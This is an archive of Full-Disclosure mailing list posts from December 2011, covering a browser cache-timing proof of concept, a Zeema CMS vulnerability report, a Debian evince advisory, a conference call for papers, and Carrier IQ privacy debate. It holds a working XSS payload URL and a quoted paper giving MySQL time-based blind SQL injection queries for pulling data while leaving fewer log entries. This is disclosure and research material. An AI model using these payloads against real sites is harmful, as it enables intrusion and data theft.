Re: [Full-disclosure] fast and somewhat reliable cache timing
> http://lcamtuf.coredump.cx/cachetime/ OK, just for the record: I improved the original PoC quite a bit, and added experimental variants for other browsers. I will shut up now. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in Zeema CMS
On Sun, Dec 04, 2011 at 03:00:42AM +0200, MustLive wrote: > Hello list! > > I want to warn you about Brute Force, Cross-Site Scripting and Full path > disclosure vulnerabilities in Zeema CMS. It's Ukrainian commercial CMS. > > - > Affected products: > - > > Vulnerable are all versions of Zeema CMS. > > -- > Details: > -- > > Brute Force (WASC-11): > > http://site/cms/ > > XSS (WASC-08): > > http://site/search/?query=%22%20style=%22-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss) > > Attack will work in Mozilla and Firefox. > > Full path disclosure (WASC-13): > > http://site/search/?page=10&query=site > > > Timeline: > > > 2011.09.12 - found vulnerabilities during audit. After that client straight > away informed developers. > 2011.10.22 - announced at my site. > 2011.10.23 - informed developers. > 2011.12.02 - disclosed at my site. > > I mentioned about these vulnerabilities at my site > (http://websecurity.com.ua/5459/). > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > http://websecurity.com.ua Again some neverheard software. Where does one find this from internet? Is there a item in issue- or bug-tracker for this? - Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2357-1] evince security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2357-1 secur...@debian.org http://www.debian.org/security/ Yves-Alexis Perez December 03, 2011 http://www.debian.org/security/faq - - Package: evince Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2010-2640 CVE-2010-2641 CVE-2010-2642 CVE-2010-264320 Debian Bug : 609534 Jon Larimer from IBM X-Force Advanced Research discovered multiple vulnerabilities in the DVI backend of the evince document viewer: CVE-2010-2640 Insuficient array bounds checks in the PK fonts parser could lead to function pointer overwrite, causing arbitrary code execution. CVE-2010-2641 Insuficient array bounds checks in the PK fonts parser could lead to function pointer overwrite, causing arbitrary code execution. CVE-2010-2642 Insuficient bounds checks in the AFM fonts parser when writing data to a memory buffer allocated on heap could lead to arbitrary memory overwrite and arbitrary code execution. CVE-2010-2643 Insuficient check on an integer used as a size for memory allocation can lead to arbitrary write outside the allocated range and cause arbitrary code execution. For the oldstable distribution (lenny), this problem has been fixed in version 2.22.2-4~lenny2. For the stable distribution (squeeze), CVE-2010-2640, CVE-2010-2641 and CVE-2010-2643 have been fixed in version 2.30.3-2 but the fix for CVE-2010-2642 was incomplete. The final fix is present in version 2.30.3-2+squeeze1. For the testing distribution (wheezy), this problem has been fixed in version 3.0.2. For the unstable distribution (sid), this problem has been fixed in version 3.0.2. We recommend that you upgrade your evince packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJO21HvAAoJEL97/wQC1SS+JxMIAK29WNymDBn531GMOwTdaCi9 rkRDz1sg44KyXuoXaP9H15TMtOgfG7bIp6CvrasPNRH5Sh9l6PfLtbadREheZ8+p /fRLE9d83v/X+8tlaRx4LDWMpaQzifhzuHWC4pY5ULTbBlJQv+B4b3PcbPAI3sWV ol8/9G4cemg26Mv20fBO6LamDr9muWeU3BT6VoT58cUJBqpSxEkEpBL1CrUunhNx rOasd67gVUNmeByg8CYAO37jjzqa8goqHRRM9bMOKcDXLgI5OpWHt2TNRkFo0rMR PyxwC2TiFiHQI24Ck2nJx3HZnEUjRsAcnZkZZFIsClFz0gMudamuGGY55+lR5uU= =sbHj -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Recruiting Troopers - Call for Papers, March 21-22 2012
Once more, it will be Troopers time. This year was an extraordinary event. Everybody involved had so much fun (in the end, the term "best security con. ever" got a bit overstressed ;-) and we had so many great talks... it seems quite difficult to do even better next year. Still, we'll try. You can be part of it. Again, Troopers - www.troopers.de - will be held in the beautiful city of Heidelberg/Germany (on 03/21 and 03/22 2012) and will feature two tracks, one on attack techniques and security research, the other focused on the defense side and management aspects of the infosec world. You might look at http://www.troopers.de/wp-content/uploads/2011/04/TR11_Enno_Rey_Keynote_Day01.pdf to get an idea of the spirit of the event. This call for papers addresses security researchers interested in sharing their work with other researchers and a high level audience (composed of about 75% people from industry and 25% from academia). We would like to invite everyone with special knowledge in breaking security in whatever area or practical experience in securing complex information systems to present their skills, tools or experience. Speaker Privileges == We will cover the flight costs (limited to EUR 750 for speakers from Europe and US$ 1800 for speakers from other continents) and three nights of accomodation, plus "some evening fun and other amenities". To get an idea of our speaker treatment see http://www.elladodelmal.com/2010/03/como-una-rockn-roll-star.html ;-) "Fresh Headz" = Given an appropriate subject and technical level we're happy to welcome "fresh speakers" (not seen in various places before) and we're happy to help you with setting up your talk (or getting over your pre-talk excitement). Submissions === We are mainly interested in talks on Security in a Mobile World Virtualization & Cloud Stuff Embedded Devices Industrial Networking Security in Telco Environments Secure Coding & Advances in the Software Security Space Feasible Risk Assessment Approaches Digital Certificates in 2012 Obviously heavy vendor-pitching will not be welcomed warmly and we reserve the right to ask for modifications of confirmed talks if we have the impression there's too much of that in a talk. CFP submissions [to c...@troopers.de] must include the following information: 1) Brief biography including list of publications and papers published previously. 2) Proposed presentation title & synopsis/description. 3) Contact Information (full name, alias, handle, e-mail, postal address, phone, country of origin, special meal requirement, smoking habits ;-). 4) Employment and/or affiliations information. 5) Why is your material different or innovative or significant? Please note that all speakers will be allocated 55 minutes of presentation time + 5 minutes Q+A. Any speakers that require more time must inform the CFP committee in the course of the submission. By agreeing to speak at Troopers 12 you are granting ERNW GmbH the rights to reproduce, distribute, advertise and show your presentation including but not limited to http://www.troopers.de, printed and/or electronic advertisements, and all other mediums. Important Dates === Deadline for Submission: 15 Dec 2011, Final Notification: 5 Jan 2012, Presentation slides due: 10 Mar 2012 The conference: 21-22 Mar 2012 == thanks, Enno -- Enno Rey ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 174 3082474 PGP FP 055F B3F3 FE9D 71DD C0D5 444E C611 033E 3296 1CC1 Handelsregister Mannheim: HRB 337135 Geschaeftsfuehrer: Enno Rey === Blog: www.insinuator.net || Conference: www.troopers.de === ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Indexed blind SQL injection
Hm... What's new? http://websec.ca/blog/view/optimized_blind_sql_injection_data_retrieval http://qwazar.ru/?p=26 [Google translate it] https://rdot.org/forum/showthread.php?p=15425 [Google translate it] On Sat, 3 Dec 2011 08:49:37 -0800, Nam Nguyen wrote: > === > Indexed blind SQL injection > === > > :Author: gamma95 and his minions > :Date: December 03, 2011 > > > Time based blind SQL attack suffers from low bit/request ratio. Each > request produces only one valuable bit of information. This paper > describes a tweak that produces higher yield at the expense of longer > runtime. Along the way, some issues and notes of applicability are > also discussed. > > > Background > ++ > > Time based blind SQL injection attack is probably the most well-known > technique in the planet. The method works by analyzing the time > difference in various queries. Because query execution time is a side > effect of a query, no visible output is required for this method to > succeed. For example, a query could request that the DBMS to sleep > for > 10 seconds if the first character of the username is ``A``. > > Usually, time based technique go hand in hand with binary search. > Instead of asking if the first character is ``1``, then ``2``, then > ``3``, it could partition the possible values into two ranges (say > from ``0`` to ``4`` and ``5`` to ``9``) and ask if the first > character > is less than ``5``. Depending on the result, it picks out the more > likely range and repeats the process until there is only one possible > value. This effectively puts a logarithmic bound on number of > requests > to the DBMS. > > In other words, each request gives us one bit of information. > > > Increasing the usable bit/request ratio > +++ > > Due to low bit/request ratio, an attack attempt usually leaves behind > too many requests in access log. This is undesirable. > > A better approach could be to encode the correct value into query > execution time itself. For example, if we know the value is a number > from 0 to 9, we could ask DBMS to sleep for that many seconds > straight. In this case, one request carries more than 3 bits of > usable > information. > > This is the principal idea behind our tweak. > > > Indexed time based attack > + > > To encode more bits into the execution time, we must work with > variable numeric delay values. Therefore, we need two things: > > + A measurable delay interval. Too short the interval and network > latency could negatively affect our measurement. Too long the delay > will also waste our time. > > + And its mapping to target values. A delay of one second could > mean character ``A`` or it could also mean some other value, > depending > on the possible domain. > > These necessitate an array-like index search. Say, if our domain is > ten (character) values from ``0`` to ``9``, then we can easily > combine > them into an array like shown below. > > :: > >1 2 3 4 5 6 7 8 9 10 (index) >| | | | | | | | | | >v v v v v v v v v v > +---+---+---+---+---+---+---+---+---+---+ > | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | (value) > +---+---+---+---+---+---+---+---+---+---+ > > Given a random character, we can tell in one request if it is in this > set, and if it is, what specific character it actually is. The way to > do that is by delaying query time by the index of the character. If > the input character is not in the set, there will be no delay. If it > is, its index is determinable from the sleep time. > > > An example > ++ > > Suppose we are trying to grab version information from a **MySQL** > server. Possible characters include 0-9 and period. Observe the > execution time. > > :: > > select sleep(find_in_set(mid(@@version, 1, 1), > '0,1,2,3,4,5,6,7,8,9,.')); > 1 row in set (6.04 sec) > # index 6, value '5' > > select sleep(find_in_set(mid(@@version, 2, 1), > '0,1,2,3,4,5,6,7,8,9,.')); > 1 row in set (11.00 sec) > # index 11, value '.' > > select sleep(find_in_set(mid(@@version, 3, 1), > '0,1,2,3,4,5,6,7,8,9,.')); > 1 row in set (2.00 sec) > # index 2, value '1' > > ... > > Each request gives us exactly one character (not bit). > > > Notes of applicability > ++ > > Adjusting sleep time > > > Faster sleep time is easily achievable by multiplying the index with > some factor smaller than 1. For example, we can sleep half the time > as > before:: > > select sleep(0.5 * find_in_set(mid(@@version, 1, 1), > '0,1,2,3,4,5,6,7,8,9,.')); > 1 row in set (3.00 sec) > # index 6, value '5' > > Similarly, longer sleep time can use factors greater than 1. > > Guarding against network latency > > > Time based attack generally works best in a fast and reliable > network
Re: [Full-disclosure] Carrier IQ for your phone
On Sat, Dec 3, 2011 at 4:14 AM, Alan J. Wylie wrote: >... > | Yes, Carrier IQ is a vast digital fishing net that sees geographic > | locations and the contents of text messages and search queries > | swimming inside the phones the software monitors.. But except > | in rare circumstances, that data is dumped out of a phone's internal > | memory almost as quickly as it goes in. one thing many of these stories seem to miss is that these limits assume a carrier in control and acting responsibly. if you're under a MitM attack these "not used" features sitting latent are now actively acting against your interests. similar to CALEA capabilities leveraged for clandestine surveillance, e.g. the Athens Affair... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] fast and somewhat reliable cache timing
hey! OK tested THIS variant, and it seems to gather *some* info, so it is working, altho, this is using Private-browsing,, the other one by the other person failed completely (visipi).. Interesting is what results it gathered... Flickr and Newegg , but no ebay or paypal :s i guess they have a higgher level of sec... very cool stuff mick! drew On 4 December 2011 19:51, Michal Zalewski wrote: >> http://lcamtuf.coredump.cx/cachetime/ > > OK, just for the record: I improved the original PoC quite a bit, and > added experimental variants for other browsers. I will shut up now. > > /mz > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Carrier IQ for your phone
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 04/12/2011 19:20, coderman wrote: > On Sat, Dec 3, 2011 at 4:14 AM, Alan J. Wylie > wrote: >> ... >> | Yes, Carrier IQ is a vast digital fishing net that sees geographic >> | locations and the contents of text messages and search queries >> | swimming inside the phones the software monitors.. But except >> | in rare circumstances, that data is dumped out of a phone's internal >> | memory almost as quickly as it goes in. > > > one thing many of these stories seem to miss is that > these limits assume a carrier in control and acting responsibly. > > if you're under a MitM attack these "not used" features sitting latent > are now actively acting against your interests. > > similar to CALEA capabilities leveraged for clandestine surveillance, > e.g. the Athens Affair... Whatever the case, the fact that this software *can* monitor and record the I/O (regardless of what it may or may not ignore) of a device means it should be removed/blocked or fed noise by anyone who values their privacy. If one doesn't have total control over any device that one uses to process info/data that one would rather not be shared, then who does have the control and what will they do with that information? Targeted advertising is the least innocuous of possibilities But hey, I am talking to a list of people that should know this ;-) Sorry for not telling you something you don't know. I use a Nokia 6170, must be getting on for 7 or 8 years old now battery is getting a little tired. Take care... watch ya back Dave -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTtwBYrIvn8UFHWSmAQJQ6gf7BCN+uFWDuMcZ0tVnBTpg0KekAUsG9v+g cqCCrWr5m5GbTU91/Qb2qTVCPx8e7omZqDpyVGx0MN30g2Z59NuMpMuM2uGdPdXv sW0wInNSZmNuhsUyWAoVtBhbS7Vir/Pwm5t2lrrJQqqWEUJF1R+gVibGGXhC9lgD e+qechei6NASiYqMzwWDynG0MjMSxnmKF3VaW7+8oqHoXgQFVdKwU5c+U9KF20iQ SmF+WmBzxLu5jbRt2TUmv2rKeq65XMOJbI1CPiVMsSPg5vHgVNzAIFNCyqxPDnXb ZLufl8xMmUsbUkbyXJ254PfQ7Qlcp1qI0+yVIztTqMYiEa06YpMuUA== =Zg+r -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
